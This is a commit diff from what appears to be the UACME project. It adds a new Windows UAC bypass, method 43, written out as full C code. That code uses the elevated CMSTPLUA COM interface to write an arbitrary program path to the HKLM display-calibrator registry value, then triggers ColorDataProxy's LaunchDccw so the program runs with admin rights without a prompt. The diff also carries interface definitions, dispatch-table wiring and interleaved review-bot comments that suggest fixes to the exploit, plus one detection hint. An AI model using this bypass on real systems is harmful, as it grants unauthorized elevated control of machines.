Method 43 added, readme updated.
hfiref0x 2017-11-10 13:31:20 +07:00
parent fbe43a1bdb
commit d4bf4d72ff
17 changed files with 297 additions and 41 deletions

Binary file not shown.

Binary file not shown.


@ -353,6 +353,14 @@ Keys (watch debug output with dbgview or similar for more info):
* Works from: Windows 7 (7600)
* Fixed in: currently unavailable in preview builds of Windows 10 RS4
* How: Shell redesign
43. Author: Oddvar Moe derivative
* Type: Elevated COM interface
* Method: IColorDataProxy, ICMLuaUtil
* Target(s): Attacker defined
* Component(s): Attacker defined
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
Note:
* Method (6) unavailable in wow64 environment starting from Windows 8;

Binary file not shown.


@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 2.82
* VERSION: 2.84
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* Global consts definition file.
*
@ -24,6 +24,7 @@
#define T_UACKEY L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"
#define T_APP_PATH L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\"
#define T_DISPLAY_CALIBRATION L"Software\\Microsoft\\Windows NT\\CurrentVersion\\ICM\\Calibration"
#define T_DOTNET_CLIENT L"Software\\Microsoft\\Windows NT\\CurrentVersion\\KnownFunctionTableDlls"
#define T_EXEFILE_SHELL L"Software\\Classes\\exefile\\shell\\runas\\command"
#define T_MSC_SHELL L"Software\\Classes\\mscfile\\shell\\open\\command"
@ -153,15 +154,19 @@
#define COR_PROFILER_PATH L"COR_PROFILER_PATH"
#define COR_ENABLE_PROFILING L"COR_ENABLE_PROFILING"
#define T_CALIBRATOR_VALUE L"DisplayCalibrator"
//
//COM objects elevation.
//
#define T_CLSID_ColorDataProxy L"{D2E7041B-2927-42fb-8E9F-7CE93B6DC937}"
#define T_CLSID_CMSTPLUA L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}"
#define T_CLSID_FileOperation L"{3AD05575-8857-4850-9277-11B85BDB8E09}"
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}"
#define T_CLSID_ShellSecurityEditor L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}"
#define T_CLSID_UninstallStringLauncher L"{FCC74B77-EC3E-4DD8-A80B-008A702075A9}"
#define T_IID_IColorDataProxy L"{0A16D195-6F47-4964-9287-9F4BAB6D9827}"
#define T_IID_ICMLuaUtil L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}"
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-45DF-8768-664147864573}"
#define T_IID_ISecurityEditor L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}"


@ -4,9 +4,9 @@
*
* TITLE: API0CRADLE.H
*
* VERSION: 2.79
* VERSION: 2.83
*
* DATE: 16 Aug 2017
* DATE: 04 Nov 2017
*
* Prototypes and definitions for api0cradle method.
*
@ -56,14 +56,19 @@ typedef struct ICMLuaUtilVtbl {
HRESULT(STDMETHODCALLTYPE *ShellExec)(
__RPC__in ICMLuaUtil * This,
_In_ LPCTSTR lpFile,
_In_opt_ LPCTSTR lpParameters,
_In_opt_ LPCTSTR lpDirectory,
_In_ ULONG fMask,
_In_ ULONG nShow
_In_opt_ LPCTSTR lpParameters,
_In_opt_ LPCTSTR lpDirectory,
_In_ ULONG fMask,
_In_ ULONG nShow
);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in ICMLuaUtil * This);
HRESULT(STDMETHODCALLTYPE *SetRegistryStringValue)(
__RPC__in ICMLuaUtil * This,
_In_ HKEY hKey,
_In_opt_ LPCTSTR lpSubKey,
_In_opt_ LPCTSTR lpValueName,
_In_ LPCTSTR lpValueString
);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in ICMLuaUtil * This);
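Review bot: The `SetRegistryStringValue` slot is declared with `LPCTSTR` parameters, whose character width depends on whether UNICODE is defined, while the caller added in HYBRIDS.C passes `L"..."` constants and an `LPWSTR` buffer. Declaring them as `_In_opt_ LPCWSTR lpSubKey`, `_In_opt_ LPCWSTR lpValueName` and `_In_ LPCWSTR lpValueString` makes the prototype independent of the build setting; the `ShellExec` slot above it has the same issue. The hunk line counts are consistent with this slot replacing the `Method8` placeholder rather than being inserted after it, but the page has lost the +/- markers and ICMLuaUtilVtbl begins and ends outside the hunk, so the slot order should be confirmed against the full struct.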


@ -0,0 +1,82 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017
*
* TITLE: CDPROXY.H
*
* VERSION: 2.83
*
* DATE: 04 Nov 2017
*
* Prototypes and definitions for ColorDataProxy method.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef interface IColorDataProxy IColorDataProxy;
typedef struct IColorDataProxyVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IColorDataProxy * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in IColorDataProxy * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method3)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method4)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method5)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method6)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method7)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method8)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method9)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method10)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *Method11)(
__RPC__in IColorDataProxy * This);
HRESULT(STDMETHODCALLTYPE *LaunchDccw)(
__RPC__in IColorDataProxy * This,
_In_ HWND hwnd);
END_INTERFACE
} *PIColorDataProxyVtbl;
interface IColorDataProxy
{
CONST_VTBL struct IColorDataProxyVtbl *lpVtbl;
};
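Review bot: CDPROXY.H has no includes of its own and depends on `interface`, `BEGIN_INTERFACE`, `STDMETHODCALLTYPE` and `HWND` already being defined by whatever was included before it; METHODS.H includes it among the other method headers, so it compiles today but is not self-contained. The `Method1` to `Method11` entries look like placeholders that exist only to keep `LaunchDccw` at its vtable position, and nothing in the file says so. A short comment above the struct stating that the layout does not come from a public header and that slots must not be added, removed or reordered would stop a later edit from silently calling a different function on the elevated object.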


@ -18,7 +18,6 @@
*******************************************************************************/
#pragma once
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {


@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.C
*
* VERSION: 2.82
* VERSION: 2.83
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* Hybrid UAC bypass methods.
*
@ -2182,3 +2182,120 @@ BOOL ucmFwCplLuaMethod(
return SUCCEEDED(r);
}
/*
* ucmDccwCOMMethod
*
* Purpose:
*
* Bypass UAC using ColorDataProxy/CCMLuaUtil undocumented COM interfaces.
* This function expects that supMasqueradeProcess was called on process initialization.
*
*/
BOOL ucmDccwCOMMethod(
_In_opt_ LPWSTR lpszPayload
)
{
HRESULT r = E_FAIL;
BOOL bCond = FALSE;
LPWSTR lpBuffer = NULL;
SIZE_T sz = 0;
IID xIID_ICMLuaUtil;
IID xIID_IColorDataProxy;
ICMLuaUtil *CMLuaUtil = NULL;
IColorDataProxy *ColorDataProxy = NULL;
WCHAR szBuffer[MAX_PATH + 1];
do {
//
// Select payload.
//
if (lpszPayload != NULL) {
lpBuffer = lpszPayload;
}
else {
//no payload specified, use default cmd.exe
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
supExpandEnvironmentStrings(T_DEFAULT_CMD, szBuffer, MAX_PATH);
lpBuffer = szBuffer;
}
sz = _strlen(lpBuffer);
if (sz == 0)
break;
//
// Create elevated COM object for CMLuaUtil.
//
if (IIDFromString(T_IID_ICMLuaUtil, &xIID_ICMLuaUtil) != S_OK) {
break;
}
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_CMSTPLUA,
CLSCTX_LOCAL_SERVER,
&xIID_ICMLuaUtil,
&CMLuaUtil);
if (r != S_OK)
break;
if (CMLuaUtil == NULL) {
r = E_FAIL;
break;
}
//
// Write new custom calibrator value to HKLM.
//
r = CMLuaUtil->lpVtbl->SetRegistryStringValue(CMLuaUtil,
HKEY_LOCAL_MACHINE,
T_DISPLAY_CALIBRATION,
T_CALIBRATOR_VALUE,
lpBuffer);
if (FAILED(r))
break;
//
// Create elevated COM object for ColorDataProxy.
//
if (IIDFromString(T_IID_IColorDataProxy, &xIID_IColorDataProxy) != S_OK) {
break;
}
r = ucmMasqueradedCoGetObjectElevate(
T_CLSID_ColorDataProxy,
CLSCTX_LOCAL_SERVER,
&xIID_IColorDataProxy,
&ColorDataProxy);
if (r != S_OK)
break;
if (ColorDataProxy == NULL) {
r = E_FAIL;
break;
}
//
// Run our "custom calibrator".
//
ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, 0);
} while (bCond);
if (CMLuaUtil != NULL) {
CMLuaUtil->lpVtbl->Release(CMLuaUtil);
}
if (ColorDataProxy != NULL) {
ColorDataProxy->lpVtbl->Release(ColorDataProxy);
}
return SUCCEEDED(r);
}
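Review bot: In ucmDccwCOMMethod the result of the final `LaunchDccw` call is discarded, so `r` still holds the S_OK from the preceding ucmMasqueradedCoGetObjectElevate call and the function returns TRUE whatever the launch returned. The same happens when the second `IIDFromString` fails, because that `break` leaves `r` at the success value from `SetRegistryStringValue`. Assign the result, `r = ColorDataProxy->lpVtbl->LaunchDccw(ColorDataProxy, NULL);`, and set `r = E_FAIL;` before the second `break`. Separately, the `DisplayCalibrator` value written under the HKLM `ICM\Calibration` key is not restored on any path in this function, so it stays on the machine after the call, and the function comment should say so. For defenders, a write to that value by a non-installer process, followed by a process start from the path it holds, is the observable artifact of this method.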


@ -4,9 +4,9 @@
*
* TITLE: HYBRIDS.H
*
* VERSION: 2.82
* VERSION: 2.83
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* Prototypes and definitions for hybrid methods.
*
@ -111,3 +111,6 @@ BOOL ucmMethodCorProfiler(
BOOL ucmFwCplLuaMethod(
_In_opt_ LPWSTR lpszPayload);
BOOL ucmDccwCOMMethod(
_In_opt_ LPWSTR lpszPayload);


@ -4,9 +4,9 @@
*
* TITLE: METHODS.C
*
* VERSION: 2.81
* VERSION: 2.83
*
* DATE: 28 Oct 2017
* DATE: 04 Nov 2017
*
* UAC bypass dispatch.
*
@ -53,7 +53,8 @@ UCM_API(MethodHakril);
UCM_API(MethodCorProfiler);
UCM_API(MethodCOMHandlers);
UCM_API(MethodCMLuaUtil);
UCM_API(MethodFwCpl);
UCM_API(MethodFwCplLua);
UCM_API(MethodDccwCOM);
UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodTest, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
@ -98,7 +99,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodCorProfiler, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCOMHandlers, NULL, { 7600, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodCMLuaUtil, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodFwCpl, NULL, { 7600, 16300 }, PAYLOAD_ID_NONE, FALSE, TRUE, TRUE }
{ MethodFwCplLua, NULL, { 7600, 16300 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },
{ MethodDccwCOM, NULL, { 7600, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE }
};
/*
@ -776,7 +778,7 @@ UCM_API(MethodCMLuaUtil)
return ucmCMLuaUtilShellExecMethod(szBuffer);
}
UCM_API(MethodFwCpl)
UCM_API(MethodFwCplLua)
{
LPWSTR lpszPayload = NULL;
@ -795,3 +797,23 @@ UCM_API(MethodFwCpl)
return ucmFwCplLuaMethod(lpszPayload);
}
UCM_API(MethodDccwCOM)
{
LPWSTR lpszPayload = NULL;
UNREFERENCED_PARAMETER(Method);
UNREFERENCED_PARAMETER(ExtraContext);
UNREFERENCED_PARAMETER(PayloadCode);
UNREFERENCED_PARAMETER(PayloadSize);
//
// Select target application or use given by optional parameter.
//
if (g_ctx.OptionalParameterLength == 0)
lpszPayload = NULL;
else
lpszPayload = g_ctx.szOptionalParameter;
return ucmDccwCOMMethod(lpszPayload);
}
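Review bot: On the renamed `MethodFwCplLua` row of ucmMethodsDispatchTable the last flag goes from `TRUE` to `FALSE` (assuming the page prints the old row first), which is a behaviour change beyond the rename and is not mentioned in the commit message. The seven columns are unnamed at the table, so neither that change nor the flags chosen for the new `MethodDccwCOM` row can be checked from here; a one-line comment above the table naming each column would fix that. The table is also positional against the UCM_METHOD enum edited in METHODS.H, so if nothing already enforces it, `C_ASSERT(UCM_DISPATCH_ENTRY_MAX == UacMethodMax);` next to the table would catch a missed row at compile time. The table body continues outside the hunks shown.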


@ -4,9 +4,9 @@
*
* TITLE: METHODS.H
*
* VERSION: 2.82
* VERSION: 2.83
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* Prototypes and definitions for UAC bypass methods table.
*
@ -61,7 +61,8 @@ typedef enum _UCM_METHOD {
UacMethodCorProfiler, //+
UacMethodCOMHandlers, //+
UacMethodCMLuaUtil, //+
UacMethodFwCpl, //+
UacMethodFwCplLua, //+
UacMethodDccwCOM, //+
UacMethodMax
} UCM_METHOD;
@ -99,6 +100,7 @@ typedef struct _UCM_API_DISPATCH_ENTRY {
#include "apphelp.h"
#include "b33f.h"
#include "carberp.h"
#include "cdproxy.h"
#include "comet.h"
#include "comfileop.h"
#include "enigma0x3.h"


@ -4,9 +4,9 @@
*
* TITLE: TEST.C
*
* VERSION: 2.82
* VERSION: 2.83
*
* DATE: 02 Nov 2017
* DATE: 04 Nov 2017
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED


@ -20,6 +20,9 @@
typedef interface ITestInterface ITestInterface;
typedef HRESULT (STDMETHODCALLTYPE *MethodPfn)(
__RPC__in ITestInterface * This);
typedef struct ITestInterfaceVtbl {
BEGIN_INTERFACE
@ -29,13 +32,17 @@ typedef struct ITestInterfaceVtbl {
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
ULONG(STDMETHODCALLTYPE *AddRef)(
__RPC__in ITestInterface * This);
ULONG(STDMETHODCALLTYPE *Release)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method1)(
MethodPfn a[200];
/* HRESULT(STDMETHODCALLTYPE *Method1)(
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method2)(
@ -81,7 +88,8 @@ typedef struct ITestInterfaceVtbl {
__RPC__in ITestInterface * This);
HRESULT(STDMETHODCALLTYPE *Method16)(
__RPC__in ITestInterface * This);
__RPC__in ITestInterface * This);*/
END_INTERFACE
} *PITestInterfaceVtbl;
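Review bot: The named slots in ITestInterfaceVtbl are replaced by `MethodPfn a[200];` while the old declarations are kept inside a `/* ... */` block; commented-out code should be deleted, since version control already holds it. `200` is an unexplained magic number and `a` says nothing about its role. Something like `MethodPfn Methods[TEST_VTBL_SLOTS];`, with the constant defined and commented above the struct, would read better. The struct body continues outside the hunks shown.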


@ -426,6 +426,7 @@
<ClInclude Include="methods\apphelp.h" />
<ClInclude Include="methods\b33f.h" />
<ClInclude Include="methods\carberp.h" />
<ClInclude Include="methods\cdproxy.h" />
<ClInclude Include="methods\comet.h" />
<ClInclude Include="methods\comfileop.h" />
<ClInclude Include="methods\enigma0x3.h" />


@ -296,6 +296,9 @@
<ClInclude Include="methods\fwcpllua.h">
<Filter>Header Files\methods</Filter>
</ClInclude>
<ClInclude Include="methods\cdproxy.h">
<Filter>Header Files\methods</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Resource.rc">


@ -1,5 +1,5 @@
04341ae85502f402ba09df680a59ad86edffb9e4d433b98d20bccbbfc74c7140 *Compiled\Akagi32.exe
67f0ad13918572c2b163185f03eb14b169f37d7863a13aadd5d3b1cfe3ade2b9 *Compiled\Akagi64.exe
5e2c78ab050bbb0390710df1766ca3431edb830d5c8bf552175b3b0b40dd3115 *Compiled\Akagi32.exe
30344b2d6335bd92331779bb3927275b20090f472345282e1a6d1515e86a4886 *Compiled\Akagi64.exe
12d2396c78432f3a0bd6281b39f3f83bf5573825aac475c94edba4886fd73ece *Compiled\UacInfo64.exe
c7aa5be04dbf1ffdd076120a617eb5e7ea154a37f5811de5b30fa006c69a4c7c *Compiled\Symdll\readme1st.txt
cfab4c45f324596e4f9a6eabedec3d2c2867e03d122ddf4becdf8b50c1ec8026 *Source\uacme.sln
@ -13,19 +13,19 @@ ef42ba52ea3b16d206ea6367b0311f544631d6f5b6110550facfc9954884a76b *Source\Akagi\b
3ee61cd0352be04ee3af1edb159ae094d4c9bcfe00db6f45c2479c965b98783e *Source\Akagi\bin64res.rc
5b746ce038ee93a1f99e423c0aa0d39976fce2dafd4e7d9d446ab6f0f0fb2c95 *Source\Akagi\compress.c
9f93bbb4c77349179641415ec9a4367a6f77dc28b093d3d11231f6abf8c3cd78 *Source\Akagi\compress.h
f696a00694bebf94b3210a26d77cc1157cebe2818fc679017db1a5333e21a127 *Source\Akagi\consts.h
f12f0a7fc07640d44bc0517c4855708c7b72671f00e7846c65cbd10f34a001dc *Source\Akagi\consts.h
68a7f3e03ec247d54f8b4ae52012e69177dd05c4b608dd9ee3bbf75d49401577 *Source\Akagi\global.h
3d9da9b6f4f68d9140b4ec7c962b56206459c5bca98e1db1e584483524bee9ce *Source\Akagi\main.c
a8ec3b9411f2408b5cfa4b0c77aa045957d3144aebd343cfa7da03d78226e3b3 *Source\Akagi\makecab.c
bd7f1ebd11ed2313bef81c4701b2444ab37d9723493bfeb9de5db2063a5213e2 *Source\Akagi\makecab.h
f1b82b53b74b4586c58b0e3a87aceb1ee43e493ef58aa9490297c6bbef247de0 *Source\Akagi\manifest.h
c90cec4c10cde815fd286d83601b4cd3738097e8e0b2e592dc28c1325c12918d *Source\Akagi\resource.h
1f8ad6c4dd3f33f0c0277b823d0c5cb2e0413eef7b6b35df85da03018fb99e18 *Source\Akagi\Resource.rc
9b42af1fbe881ecc8cd22cd4d37446e810485befa9365a62a031865a2e81e2d7 *Source\Akagi\Resource.rc
4ba63fffb2838c59534b66f6f4e5960ff8559be59a01597ad560dc2cdcee3dbb *Source\Akagi\sup.c
af229de9ed6dae7fe5364381ab3ac96e4ac0e9b6a8f42078259dbe8dbec2711d *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
2eb157a5d218534435d07c9dddcdad303ef23b5757449f1629ba78bb0dbf9334 *Source\Akagi\uacme.vcxproj
2b87dc9e056ad349cbd7a79ce043acf4fea771b05842ac7023f601c9b37ff6a6 *Source\Akagi\uacme.vcxproj.filters
3a563ced011f65d84309ecac6e518560393a8b62f19ce8ef18d95bc9d8a34d22 *Source\Akagi\uacme.vcxproj
5ead1ab3d46fd0e04779882dfb35df51c6ea51939fbac78b2a0d9ff12f713c85 *Source\Akagi\uacme.vcxproj.filters
cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user
2d05d08e1436fa05e5247e876b3f187b3354b76f4cabfecbdc4e557968037424 *Source\Akagi\windefend.c
1b9e0a1f3734feb1d1f94defb48972b479225d76fc97997c9b240c0f3b6453a8 *Source\Akagi\windefend.h
@ -42,12 +42,13 @@ cf5e43ec5d5acb53045e88d8e8a2a34e3b3a2fbbdb4acb4ca37eb1c3e7b1d3dd *Source\Akagi\b
d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib
dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib
63930fd4e5fa4e67ec923c88995362e4d91c4c7a66be1da26b57ec37d89f3e29 *Source\Akagi\methods\api0cradle.c
6e5c157d02b69f573345bb460adf0032fa6fd9b5f7c390699995dbd3ab12a812 *Source\Akagi\methods\api0cradle.h
a73b25f6f839f29dd91587e5b8c19ae707575f8791e3ef08dd262349a04c111a *Source\Akagi\methods\api0cradle.h
c38c4dc7d03484215e6fa531a795e80bd1951504ca6938cad5886d17adbf4a27 *Source\Akagi\methods\apphelp.h
ff3430dee2f8043a4be9a1235a3baaedeeeeaec2a1befba068a46d9ef42f3c49 *Source\Akagi\methods\b33f.c
1ce892263ef00aa1ac52f365519e800d7ac4535ac55454f0c777b17033769d8c *Source\Akagi\methods\b33f.h
e374e07b617a16d72dd21de250e4611866b509de15715957bed018ea07db62c3 *Source\Akagi\methods\carberp.c
b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\methods\carberp.h
c62f98b79c86e4fa6b90f8af480f18bc21e2dc90af268ce6ba6e343789ac3856 *Source\Akagi\methods\cdproxy.h
0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c
@ -56,15 +57,15 @@ b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\m
878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h
e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
c80a6ec7ce870c8df4b9e15783dc077945852f7e9c078b49ba2f95a86bd222d9 *Source\Akagi\methods\fwcpllua.h
3827958bc16dcec779fa5751f1d368370285eb2bddfa30ff803478ee1c2cabf2 *Source\Akagi\methods\fwcpllua.h
6e2608ff58c3f1777a1cb0464b896c99eefbf933db4a8ff4de3465b849e49e99 *Source\Akagi\methods\gootkit.c
7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h
b0c8e8e88559fdb6ce96d2404c56b0830976d5f5911b89425cc26f686f36f02f *Source\Akagi\methods\hakril.c
6f2e173a90393eec705ad558c22874dbd41c07a597eff3448165a4124aaa442b *Source\Akagi\methods\hakril.h
f2fc69584696a2dfa052a6ff8650c715d526fc0b26258fe2f58c608f515f9a67 *Source\Akagi\methods\hybrids.c
534912bb33311a4e4dc35c12abd7a24642aa9e2acd94e2cba4896d7ba277295f *Source\Akagi\methods\hybrids.h
564fae5e3dee300847a3e0a09b24de853d8f510fc9dd0eb923a8fa2ec4dc80b4 *Source\Akagi\methods\methods.c
26d1b8fa856522556923d329d3324e4bb8b7698b7b74447f1a3b06b4491013b1 *Source\Akagi\methods\methods.h
9dd0de9e974824f28a6e02bfc3a6f37b5ac8edfa629fd87e2c4e1e73fa6c3c5f *Source\Akagi\methods\hybrids.c
354e8ec194b93264c998e7a999cedb909f7481eb0c0a5843a1fc129084bc8934 *Source\Akagi\methods\hybrids.h
b0eab04bb9fc3557270bf172429f21e41c20ee85d0f8b65989f1c06341bd9964 *Source\Akagi\methods\methods.c
b9776680e0f2ba72eff2a02619aae2c27c5debf194c690edae447c7faf919092 *Source\Akagi\methods\methods.h
4b9ef8073d1e9ad80050a74d53c7c4f11cfed18c6252faf49b2ea00502415a1b *Source\Akagi\methods\pitou.c
9faab51fb7a0614dcf285ea02b468aee1edb50bb00b9dda8da20260d7460d255 *Source\Akagi\methods\pitou.h
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c
@ -89,8 +90,8 @@ e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e *Source\Akagi\m
604d1cdf45c5a95bc9cf1bbf39ca05ef83013541101d34971c5cd7577e3d5247 *Source\Akagi\minhook\hde\pstdint.h
43bf687a9fff071b5f46070db4d36c846f8e069cdc57485ee897c499aacdde23 *Source\Akagi\minhook\hde\table32.h
b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2 *Source\Akagi\minhook\hde\table64.h
c3c98c9a4b43219bcd38bff7c21dd69af1e3c8912f338162e912ccabb495cff7 *Source\Akagi\tests\test.c
9b0ef3097318c0876b569b64f7ecdee3bba0a189aa770887d0b825ff7adc8dfb *Source\Akagi\tests\test.h
abf5350c10eedc9857741f0d221156007f3d78e283ae39a6421379685995c37c *Source\Akagi\tests\test.c
1402f6f278457fdea7bdedb49785c74d775c625c425fc347ece6652940c65878 *Source\Akagi\tests\test.h
09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress
4581ed25d561afd247c01d71d13c698b79503357f16d4c18832e01c2381ce630 *Source\Akatsuki\Akatsuki.vcxproj
9b57b5d6ca1ca38eb87ba36e82595525c4ccec1069ee81f4b24c6809c5b979b8 *Source\Akatsuki\Akatsuki.vcxproj.filters